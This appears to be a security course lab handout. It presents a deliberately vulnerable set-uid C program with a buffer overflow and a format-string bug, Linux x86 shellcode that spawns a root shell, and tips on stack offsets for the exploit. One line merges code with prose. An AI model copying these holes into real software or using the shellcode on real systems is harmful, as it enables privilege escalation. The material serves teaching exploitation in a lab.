This lab is in the form of a virtual machine that you can run with the tools Oracle Virtual Box or VMWare Player.
Further instructions and a list of deliverables is contained in the file instructions.txt, which is included in the virtual machine.
The Virtual Machine is available in two formats:
#include <stdio.h>This program is compiled and has set-uid flag of the user r00t
#include <stdlib.h>
#define HOSTNAMELEN 256
#define IPADDR 1
#define HOSTNAME 2
#define ALIAS 3
#define HOSTFILE "/home/r00t/hosts"
void add_alias(char *ip, char *hostname, char *alias) {
char formatbuffer[256];
FILE *file;
sprintf(formatbuffer, "%s\t%s\t%s\n", ip, hostname, alias);
file = fopen(HOSTFILE, "a");
if (file == NULL) {
perror("fopen");
exit(EXIT_FAILURE);
}
fprintf(file, formatbuffer);
if (fclose(file) != 0) {
perror("close");
exit(EXIT_FAILURE);
}
}
int main(int argc, char *argv[]) {
if (argc != 4) {
printf("Usage: %s ipaddress hostname alias \n", argv[0]);
exit(EXIT_FAILURE);
}
add_alias(argv[IPADDR], argv[HOSTNAME], argv[ALIAS]);
return(0);
}
> ls -l /usr/bin/addhostalias
-rwsr-xr-x 1 r00t r00t 14512 Apr 5 11:48 /usr/bin/addhostalias
The following shellcode is useful to build a buffer overrun. It avoids nul-characters, and fits in the buffer in the vulnerable program. This file, and a Python/Perl compatible version are included in the virtual machine.
#ifndef _SHELLCODE_H
#define _SHELLCODE_H
static char shellcode[] =
"\xb9\xff\xff\xff\xff"
"\x31\xc0" //sets real user id from effective user id.
"\xb0\x31"
"\xcd\x80"
"\x89\xc3" // copy the value to ebx
"\x31\xc0"
"\xb0\x46"
"\xcd\x80"
"\x31\xc0"
"\xb0\x32"
"\xcd\x80"
"\x89\xc3"
"\xb0\x31"
"\xb0\x47" //sets real group id from effective user id.
"\xcd\x80"
"\x31\xc0"
"\x31\xd2"
"\x52"
"\x68\x2f\x2f\x73\x68"
"\x68\x2f\x62\x69\x6e"
"\x89\xe3"
"\x52"
"\x53"
"\x89\xe1"
"\xb0\x0b"
"\xcd\x80"
"\x31\xc0"
"\x40"
"\xcd\x80";
#endif /* _SHELLCODE_H */
Beware that solutions based on the Smashing The Stack For Fun And Profit tutorial are sensitive to the size of the environment. The shellcode used will start a new shell, and does not exit it even if the r00ting fails. This means, in the next attempt, you might be running in a nested shell and, therefore, in a different environment The offset number depends of the stack addresses in that environment. If your exploit successes in some deeply nested shell, might not be reproducible later.